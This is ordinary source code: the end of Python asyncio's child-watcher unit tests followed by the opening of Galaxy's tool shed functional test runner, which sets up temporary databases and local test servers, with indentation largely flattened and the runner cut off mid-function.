with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children_terminating_together(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(45, callback1, 17, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(46, callback2, 1147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (code 78)
# child 2 terminates (signal 5)
self.add_zombie(45, 78)
self.add_zombie(46, -5)
self.running = False
self.watcher._sig_chld()
callback1.assert_called_once_with(45, 78, 17, 8)
callback2.assert_called_once_with(46, -5, 1147, 18)
self.assertTrue(m.WIFSIGNALED.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
m.WEXITSTATUS.reset_mock()
callback1.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(45, 14)
self.add_zombie(46, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_race_condition(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
# child terminates before being registered
self.add_zombie(50, 4)
self.watcher._sig_chld()
self.watcher.add_child_handler(50, callback, 1, 12)
callback.assert_called_once_with(50, 4, 1, 12)
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(50, -1)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_replace_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(51, callback1, 19)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register the same child again
with self.watcher:
self.watcher.add_child_handler(51, callback2, 21)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (signal 8)
self.running = False
self.add_zombie(51, -8)
self.watcher._sig_chld()
callback2.assert_called_once_with(51, -8, 21)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback2.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(51, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_remove_handler(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(52, callback, 1984)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# unregister the child
self.watcher.remove_child_handler(52)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (code 99)
self.running = False
self.add_zombie(52, 99)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_unknown_status(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(53, callback, -19)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# terminate with unknown status
self.zombies[53] = 1178
self.running = False
self.watcher._sig_chld()
callback.assert_called_once_with(53, 1178, -19)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.reset_mock()
m.WIFEXITED.reset_mock()
m.WIFSIGNALED.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(53, 101)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_remove_child_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
# register children
with self.watcher:
self.running = True
self.watcher.add_child_handler(54, callback1, 1)
self.watcher.add_child_handler(55, callback2, 2)
self.watcher.add_child_handler(56, callback3, 3)
# remove child handler 1
self.assertTrue(self.watcher.remove_child_handler(54))
# remove child handler 2 multiple times
self.assertTrue(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
# all children terminate
self.add_zombie(54, 0)
self.add_zombie(55, 1)
self.add_zombie(56, 2)
self.running = False
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(56, 2, 3)
@waitpid_mocks
def test_sigchld_unhandled_exception(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(57, callback)
# raise an exception
m.waitpid.side_effect = ValueError
with mock.patch.object(log.logger,
'error') as m_error:
self.assertEqual(self.watcher._sig_chld(), None)
self.assertTrue(m_error.called)
@waitpid_mocks
def test_sigchld_child_reaped_elsewhere(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(58, callback)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates
self.running = False
self.add_zombie(58, 4)
# waitpid is called elsewhere
os.waitpid(58, os.WNOHANG)
m.waitpid.reset_mock()
# sigchld
with self.ignore_warnings:
self.watcher._sig_chld()
if isinstance(self.watcher, asyncio.FastChildWatcher):
            # here the FastChildWatcher enters a deadlock
# (there is no way to prevent it)
self.assertFalse(callback.called)
else:
callback.assert_called_once_with(58, 255)
@waitpid_mocks
def test_sigchld_unknown_pid_during_registration(self, m):
# register two children
callback1 = mock.Mock()
callback2 = mock.Mock()
with self.ignore_warnings, self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(591, 7)
# an unknown child terminates
self.add_zombie(593, 17)
self.watcher._sig_chld()
self.watcher.add_child_handler(591, callback1)
self.watcher.add_child_handler(592, callback2)
callback1.assert_called_once_with(591, 7)
self.assertFalse(callback2.called)
@waitpid_mocks
def test_set_loop(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(60, callback)
# attach a new loop
old_loop = self.loop
self.loop = test_utils.TestLoop()
patch = mock.patch.object
with patch(old_loop, "remove_signal_handler") as m_old_remove, \
patch(self.loop, "add_signal_handler") as m_new_add:
self.watcher.attach_loop(self.loop)
m_old_remove.assert_called_once_with(
signal.SIGCHLD)
m_new_add.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
# child terminates
self.running = False
self.add_zombie(60, 9)
self.watcher._sig_chld()
callback.assert_called_once_with(60, 9)
@waitpid_mocks
def test_set_loop_race_condition(self, m):
# register 3 children
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(61, callback1)
self.watcher.add_child_handler(62, callback2)
self.watcher.add_child_handler(622, callback3)
# detach the loop
old_loop = self.loop
self.loop = None
with mock.patch.object(
old_loop, "remove_signal_handler") as m_remove_signal_handler:
self.watcher.attach_loop(None)
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
# child 1 & 2 terminate
self.add_zombie(61, 11)
self.add_zombie(62, -5)
# SIGCHLD was not caught
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(callback3.called)
# attach a new loop
self.loop = test_utils.TestLoop()
with mock.patch.object(
self.loop, "add_signal_handler") as m_add_signal_handler:
self.watcher.attach_loop(self.loop)
m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
callback1.assert_called_once_with(61, 11) # race condition!
callback2.assert_called_once_with(62, -5) # race condition!
self.assertFalse(callback3.called)
callback1.reset_mock()
callback2.reset_mock()
# child 3 terminates
self.running = False
self.add_zombie(622, 19)
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(622, 19)
@waitpid_mocks
def test_close(self, m):
# register two children
callback1 = mock.Mock()
with self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(63, 9)
# other child terminates
self.add_zombie(65, 18)
self.watcher._sig_chld()
self.watcher.add_child_handler(63, callback1)
self.watcher.add_child_handler(64, callback1)
self.assertEqual(len(self.watcher._callbacks), 1)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertEqual(len(self.watcher._zombies), 1)
with mock.patch.object(
self.loop,
"remove_signal_handler") as m_remove_signal_handler:
self.watcher.close()
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
self.assertFalse(self.watcher._callbacks)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertFalse(self.watcher._zombies)
class SafeChildWatcherTests (ChildWatcherTestsMixin, unittest.TestCase):
def create_watcher(self):
return asyncio.SafeChildWatcher()
class FastChildWatcherTests (ChildWatcherTestsMixin, unittest.TestCase):
def create_watcher(self):
return asyncio.FastChildWatcher()
class PolicyTests(unittest.TestCase):
def create_policy(self):
return asyncio.DefaultEventLoopPolicy()
def test_get_child_watcher(self):
policy = self.create_policy()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
self.assertIsNone(watcher._loop)
def test_get_child_watcher_after_set(self):
policy = self.create_policy()
watcher = asyncio.FastChildWatcher()
policy.set_child_watcher(watcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_with_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIs(watcher._loop, loop)
loop.close()
def test_get_child_watcher_thread(self):
def f():
policy.set_event_loop(policy.new_event_loop())
self.assertIsInstance(policy.get_event_loop(),
asyncio.AbstractEventLoop)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIsNone(watcher._loop)
policy.get_event_loop().close()
policy = self.create_policy()
th = threading.Thread(target=f)
th.start()
th.join()
def test_child_watcher_replace_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
watcher = policy.get_child_watcher()
self.assertIs(watcher._loop, loop)
new_loop = policy.new_event_loop()
policy.set_event_loop(new_loop)
self.assertIs(watcher._loop, new_loop)
policy.set_event_loop(None)
self.assertIs(watcher._loop, None)
loop.close()
new_loop.close()
if __name__ == '__main__':
unittest.main()
|
functional_tests.py
|
#!/usr/bin/env python
import os
import sys
import shutil
import tempfile
import re
import string
import multiprocessing
import unittest
import time
import threading
import random
import httplib
import socket
import urllib
import atexit
import logging
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
tool_shed_home_directory = os.path.join( cwd, 'test', 'tool_shed' )
default_tool_shed_test_file_dir = os.path.join( tool_shed_home_directory, 'test_data' )
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directory where the repositories are located cannot contain invalid URL characters.
tool_shed_test_tmp_dir = os.path.join( tool_shed_home_directory, 'tmp' )
os.environ[ 'TOOL_SHED_TEST_TMP_DIR' ] = tool_shed_test_tmp_dir
new_path = [ os.path.join( cwd, "lib" ), os.path.join( cwd, "test" ) ]
new_path.extend( sys.path[1:] )
sys.path = new_path
from galaxy import eggs, model
eggs.require( "nose" )
eggs.require( "NoseHTML" )
eggs.require( "NoseTestDiff" )
eggs.require( "twill==0.9" )
eggs.require( "Paste" )
eggs.require( "PasteDeploy" )
eggs.require( "Cheetah" )
# This should not be required, but it is under certain conditions, thanks to this bug: http://code.google.com/p/python-nose/issues/detail?id=284
eggs.require( "pysqlite" )
import twill
from paste import httpserver
# This is for the tool shed application.
import galaxy.webapps.tool_shed.app
from galaxy.webapps.tool_shed.app import UniverseApplication as ToolshedUniverseApplication
from galaxy.webapps.tool_shed import buildapp as toolshedbuildapp
# This is for the galaxy application.
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.web import buildapp as galaxybuildapp
from galaxy.util import asbool
from galaxy.util.json import to_json_string
import nose.core
import nose.config
import nose.loader
import nose.plugins.manager
from functional import database_contexts
log = logging.getLogger( "tool_shed_functional_tests.py" )
default_tool_shed_test_host = "localhost"
default_tool_shed_test_port_min = 8000
default_tool_shed_test_port_max = 8999
default_tool_shed_locales = 'en'
default_galaxy_test_port_min = 9000
default_galaxy_test_port_max = 9999
default_galaxy_test_host = 'localhost'
# Use separate databases for Galaxy and tool shed install info by default,
# set GALAXY_TEST_INSTALL_DB_MERGED to True to revert to merged databases
# behavior.
default_install_db_merged = False
# should this serve static resources (scripts, images, styles, etc.)
STATIC_ENABLED = True
def get_static_settings():
"""Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
cwd = os.getcwd()
static_dir = os.path.join( cwd, 'static' )
#TODO: these should be copied from universe_wsgi.ini
return dict(
#TODO: static_enabled needed here?
static_enabled = True,
static_cache_time = 360,
static_dir = static_dir,
static_images_dir = os.path.join( static_dir, 'images', '' ),
static_favicon_dir = os.path.join( static_dir, 'favicon.ico' ),
static_scripts_dir = os.path.join( static_dir, 'scripts', '' ),
static_style_dir = os.path.join( static_dir, 'june_2007_style', 'blue' ),
static_robots_txt = os.path.join( static_dir, 'robots.txt' ),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent as the first argument to app_factory.
"""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
if STATIC_ENABLED:
global_conf.update( get_static_settings() )
return global_conf
tool_sheds_conf_xml_template = '''<?xml version="1.0"?>
<tool_sheds>
<tool_shed name="Galaxy main tool shed" url="http://toolshed.g2.bx.psu.edu/"/>
<tool_shed name="Galaxy test tool shed" url="http://testtoolshed.g2.bx.psu.edu/"/>
<tool_shed name="Embedded tool shed for functional tests" url="http://${shed_url}:${shed_port}/"/>
</tool_sheds>
'''
shed_tool_conf_xml_template = '''<?xml version="1.0"?>
<toolbox tool_path="${shed_tool_path}">
</toolbox>
'''
tool_conf_xml = '''<?xml version="1.0"?>
<toolbox>
<section name="Get Data" id="getext">
<tool file="data_source/upload.xml"/>
</section>
</toolbox>
'''
tool_data_table_conf_xml_template = '''<?xml version="1.0"?>
<tables>
</tables>
'''
shed_data_manager_conf_xml_template = '''<?xml version="1.0"?>
<data_managers>
</data_managers>
'''
def run_tests( test_config ):
loader = nose.loader.TestLoader( config=test_config )
plug_loader = test_config.plugins.prepareTestLoader( loader )
if plug_loader is not None:
loader = plug_loader
tests = loader.loadTestsFromNames( test_config.testNames )
test_runner = nose.core.TextTestRunner( stream=test_config.stream,
verbosity=test_config.verbosity,
config=test_config )
plug_runner = test_config.plugins.prepareTestRunner( test_runner )
if plug_runner is not None:
test_runner = plug_runner
return test_runner.run( tests )
def main():
# ---- Configuration ------------------------------------------------------
tool_shed_test_host = os.environ.get( 'TOOL_SHED_TEST_HOST', default_tool_shed_test_host )
tool_shed_test_port = os.environ.get( 'TOOL_SHED_TEST_PORT', None )
galaxy_test_host = os.environ.get( 'GALAXY_TEST_HOST', default_galaxy_test_host )
galaxy_test_port = os.environ.get( 'GALAXY_TEST_PORT', None )
tool_path = os.environ.get( 'TOOL_SHED_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_tool_shed_locales
tool_shed_test_file_dir = os.environ.get( 'TOOL_SHED_TEST_FILE_DIR', default_tool_shed_test_file_dir )
    if not os.path.isabs( tool_shed_test_file_dir ):
        tool_shed_test_file_dir = os.path.abspath( tool_shed_test_file_dir )
ignore_files = ()
tool_dependency_dir = os.environ.get( 'TOOL_SHED_TOOL_DEPENDENCY_DIR', None )
use_distributed_object_store = os.environ.get( 'TOOL_SHED_USE_DISTRIBUTED_OBJECT_STORE', False )
if not os.path.isdir( tool_shed_test_tmp_dir ):
os.mkdir( tool_shed_test_tmp_dir )
tool_shed_test_proxy_port = None
galaxy_test_proxy_port = None
if 'TOOL_SHED_TEST_DBPATH' in os.environ:
shed_db_path = os.environ[ 'TOOL_SHED_TEST_DBPATH' ]
else:
tempdir = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
shed_db_path = os.path.join( tempdir, 'database' )
shed_tool_data_table_conf_file = os.environ.get( 'TOOL_SHED_TEST_TOOL_DATA_TABLE_CONF', os.path.join( tool_shed_test_tmp_dir, 'shed_tool_data_table_conf.xml' ) )
galaxy_shed_data_manager_conf_file = os.environ.get( 'GALAXY_SHED_DATA_MANAGER_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_shed_data_manager_conf.xml' ) )
galaxy_tool_data_table_conf_file = os.environ.get( 'GALAXY_TEST_TOOL_DATA_TABLE_CONF', os.path.join( tool_shed_test_tmp_dir, 'tool_data_table_conf.xml' ) )
galaxy_tool_conf_file = os.environ.get( 'GALAXY_TEST_TOOL_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_tool_conf.xml' ) )
galaxy_shed_tool_conf_file = os.environ.get( 'GALAXY_TEST_SHED_TOOL_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_shed_tool_conf.xml' ) )
galaxy_migrated_tool_conf_file = os.environ.get( 'GALAXY_TEST_MIGRATED_TOOL_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_migrated_tool_conf.xml' ) )
galaxy_tool_sheds_conf_file = os.environ.get( 'GALAXY_TEST_TOOL_SHEDS_CONF', os.path.join( tool_shed_test_tmp_dir, 'test_sheds_conf.xml' ) )
if 'GALAXY_TEST_TOOL_DATA_PATH' in os.environ:
tool_data_path = os.environ.get( 'GALAXY_TEST_TOOL_DATA_PATH' )
else:
tool_data_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
os.environ[ 'GALAXY_TEST_TOOL_DATA_PATH' ] = tool_data_path
if 'GALAXY_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_TEST_DBPATH' ]
else:
tempdir = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_db_path = os.path.join( tempdir, 'database' )
shed_file_path = os.path.join( shed_db_path, 'files' )
galaxy_file_path = os.path.join( galaxy_db_path, 'files' )
hgweb_config_file_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
new_repos_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_tempfiles = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_shed_tool_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_migrated_tool_path = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
galaxy_tool_dependency_dir = tempfile.mkdtemp( dir=tool_shed_test_tmp_dir )
os.environ[ 'GALAXY_TEST_TOOL_DEPENDENCY_DIR' ] = galaxy_tool_dependency_dir
hgweb_config_dir = hgweb_config_file_path
os.environ[ 'TEST_HG_WEB_CONFIG_DIR' ] = hgweb_config_dir
print "Directory location for hgweb.config:", hgweb_config_dir
if 'TOOL_SHED_TEST_DBURI' in os.environ:
toolshed_database_connection = os.environ[ 'TOOL_SHED_TEST_DBURI' ]
else:
toolshed_database_connection = 'sqlite:///' + os.path.join( shed_db_path, 'community_test.sqlite' )
galaxy_database_auto_migrate = False
if 'GALAXY_TEST_DBURI' in os.environ:
galaxy_database_connection = os.environ[ 'GALAXY_TEST_DBURI' ]
else:
db_path = os.path.join( galaxy_db_path, 'universe.sqlite' )
if 'GALAXY_TEST_DB_TEMPLATE' in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
__copy_database_template(os.environ['GALAXY_TEST_DB_TEMPLATE'], db_path)
galaxy_database_auto_migrate = True
galaxy_database_connection = 'sqlite:///%s' % db_path
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ[ 'GALAXY_TEST_INSTALL_DBURI' ]
elif asbool( os.environ.get( 'GALAXY_TEST_INSTALL_DB_MERGED', default_install_db_merged ) ):
install_galaxy_database_connection = galaxy_database_connection
else:
install_galaxy_db_path = os.path.join( galaxy_db_path, 'install.sqlite' )
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
tool_shed_global_conf = get_webapp_global_conf()
tool_shed_global_conf[ '__file__' ] = 'tool_shed_wsgi.ini.sample'
kwargs = dict( admin_users = 'test@bx.psu.edu',
allow_user_creation = True,
allow_user_deletion = True,
database_connection = toolshed_database_connection,
datatype_converters_config_file = 'datatype_converters_conf.xml.sample',
file_path = shed_file_path,
global_conf = tool_shed_global_conf,
hgweb_config_dir = hgweb_config_dir,
job_queue_workers = 5,
id_secret = 'changethisinproductiontoo',
log_destination = "stdout",
new_file_path = new_repos_path,
running_functional_tests = True,
shed_tool_data_table_config = shed_tool_data_table_conf_file,
smtp_server = 'smtp.dummy.string.tld',
email_from = 'functional@localhost',
template_path = 'templates',
tool_path=tool_path,
tool_parse_help = False,
tool_data_table_config_path = galaxy_tool_data_table_conf_file,
use_heartbeat = False )
for dir in [ tool_shed_test_tmp_dir ]:
try:
os.makedirs( dir )
except OSError:
pass
print "Tool shed database connection:", toolshed_database_connection
print "Galaxy database connection:", galaxy_database_connection
# Generate the tool_data_table_conf.xml file.
file( galaxy_tool_data_table_conf_file, 'w' ).write( tool_data_table_conf_xml_template )
# Generate the shed_tool_data_table_conf.xml file.
file( shed_tool_data_table_conf_file, 'w' ).write( tool_data_table_conf_xml_template )
os.environ[ 'TOOL_SHED_TEST_TOOL_DATA_TABLE_CONF' ] = shed_tool_data_table_conf_file
# ---- Build Tool Shed Application --------------------------------------------------
toolshedapp = None
# if not toolshed_database_connection.startswith( 'sqlite://' ):
# kwargs[ 'database_engine_option_max_overflow' ] = '20'
if tool_dependency_dir is not None:
kwargs[ 'tool_dependency_dir' ] = tool_dependency_dir
if use_distributed_object_store:
kwargs[ 'object_store' ] = 'distributed'
kwargs[ 'distributed_object_store_config_file' ] = 'distributed_object_store_conf.xml.sample'
kwargs[ 'global_conf' ] = tool_shed_global_conf
if not toolshed_database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_pool_size' ] = '10'
toolshedapp = ToolshedUniverseApplication( **kwargs )
database_contexts.tool_shed_context = toolshedapp.model.context
log.info( "Embedded Toolshed application started" )
# ---- Run tool shed webserver ------------------------------------------------------
tool_shed_server = None
tool_shed_global_conf[ 'database_connection' ] = toolshed_database_connection
toolshedwebapp = toolshedbuildapp.app_factory( tool_shed_global_conf,
use_translogger=False,
static_enabled=True,
app=toolshedapp )
if tool_shed_test_port is not None:
tool_shed_server = httpserver.serve( toolshedwebapp, host=tool_shed_test_host, port=tool_shed_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
tool_shed_test_port = str( random.randint( default_tool_shed_test_port_min, default_tool_shed_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s" % tool_shed_test_port )
tool_shed_server = httpserver.serve( toolshedwebapp, host=tool_shed_test_host, port=tool_shed_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( default_tool_shed_test_port_min, default_tool_shed_test_port_max ) )
if tool_shed_test_proxy_port:
os.environ[ 'TOOL_SHED_TEST_PORT' ] = tool_shed_test_proxy_port
else:
os.environ[ 'TOOL_SHED_TEST_PORT' ] = tool_shed_test_port
t = threading.Thread( target=tool_shed_server.serve_forever )
t.start()
# Test if the server is up
for i in range( 10 ):
# Directly test the app, not the proxy.
conn = httplib.HTTPConnection( tool_shed_test_host, tool_shed_test_port )
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded web server started" )
# ---- Optionally start up a Galaxy instance ------------------------------------------------------
if 'TOOL_SHED_TEST_OMIT_GALAXY' not in os.environ:
# Generate the tool_conf.xml file.
file( galaxy_tool_conf_file, 'w' ).write( tool_conf_xml )
        # Generate the tool_sheds_conf.xml file.
tool_sheds_conf_template_parser = string.Template( tool_sheds_conf_xml_template )
tool_sheds_conf_xml = tool_sheds_conf_template_parser.safe_substitute( shed_url=tool_shed_test_host, shed_port=tool_shed_test_port )
file( galaxy_tool_sheds_conf_file, 'w' ).write( tool_sheds_conf_xml )
        # Generate the shed_tool_conf.xml file.
shed_tool_conf_template_parser = string.Template( shed_tool_conf_xml_template )
shed_tool_conf_xml = shed_tool_conf_template_parser.safe_substitute( shed_tool_path=galaxy_shed_tool_path )
file( galaxy_shed_tool_conf_file, 'w' ).write( shed_tool_conf_xml )
# Generate the migrated_tool_conf.xml file.
migrated_tool_conf_xml = shed_tool_conf_template_parser.safe_substitute( shed_tool_path=galaxy_migrated_tool_path )
file( galaxy_migrated_tool_conf_file, 'w' ).write( migrated_tool_conf_xml )
os.environ[ 'GALAXY_TEST_SHED_TOOL_CONF' ] = galaxy_shed_tool_conf_file
# Generate shed_data_manager_conf.xml
if not os.environ.get( 'GALAXY_SHED_DATA_MANAGER_CONF' ):
open( galaxy_shed_data_manager_conf_file, 'wb' ).write( shed_data_manager_conf_xml_template )
galaxy_global_conf = get_webapp_global_conf()
galaxy_global_conf[ '__file__' ] = 'universe_wsgi.ini.sample'
kwargs = dict( allow_user_creation = True,
allow_user_deletion = True,
admin_users = 'test@bx.psu.edu',
allow_library_path_paste = True,
install_database_connection = install_galaxy_database_connection,
database_connection = galaxy_database_connection,
database_auto_migrate = galaxy_database_auto_migrate,
datatype_converters_config_file = "datatype_converters_conf.xml.sample",
enable_tool_shed_check = True,
file_path = galaxy_file_path,
global_conf = galaxy_global_conf,
hours_between_check = 0.001,
id_secret = 'changethisinproductiontoo',
job_queue_workers = 5,
log_destination = "stdout",
migrated_tools_config = galaxy_migrated_tool_conf_file,
new_file_path = galaxy_tempfiles,
running_functional_tests=True,
shed_data_manager_config_file = galaxy_shed_data_manager_conf_file,
shed_tool_data_table_config = shed_tool_data_table_conf_file,
shed_tool_path = galaxy_shed_tool_path,
template_path = "templates",
tool_data_path = tool_data_path,
tool_dependency_dir = galaxy_tool_dependency_dir,
tool_path = tool_path,
tool_config_file = [ galaxy_tool_conf_file, galaxy_shed_tool_conf_file ],
tool_sheds_config_file = galaxy_tool_sheds_conf_file,
tool_parse_help = False,
tool_data_table_config_path = galaxy_tool_data_table_conf_file,
update_integrated_tool_panel = False,
use_heartbeat = False )
# ---- Build Galaxy Application --------------------------------------------------
if not galaxy_database_connection.startswith( 'sqlite://' ) and not install_galaxy_database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_pool_size' ] = '10'
kwargs[ 'database_engine_option_max_overflow' ] = '20'
galaxyapp = GalaxyUniverseApplication( **kwargs )
log.info( "Embedded Galaxy application started" )
# ---- Run galaxy webserver ------------------------------------------------------
galaxy_server = None
galaxy_global_conf[ 'database_file' ] = galaxy_database_connection
galaxywebapp = galaxybuildapp.app_factory( galaxy_global_conf,
use_translogger=False,
static_enabled=True,
app=galaxyapp )
database_contexts.galaxy_context = galaxyapp.model.context
database_contexts.install_context = galaxyapp.install_model.context
if galaxy_test_port is not None:
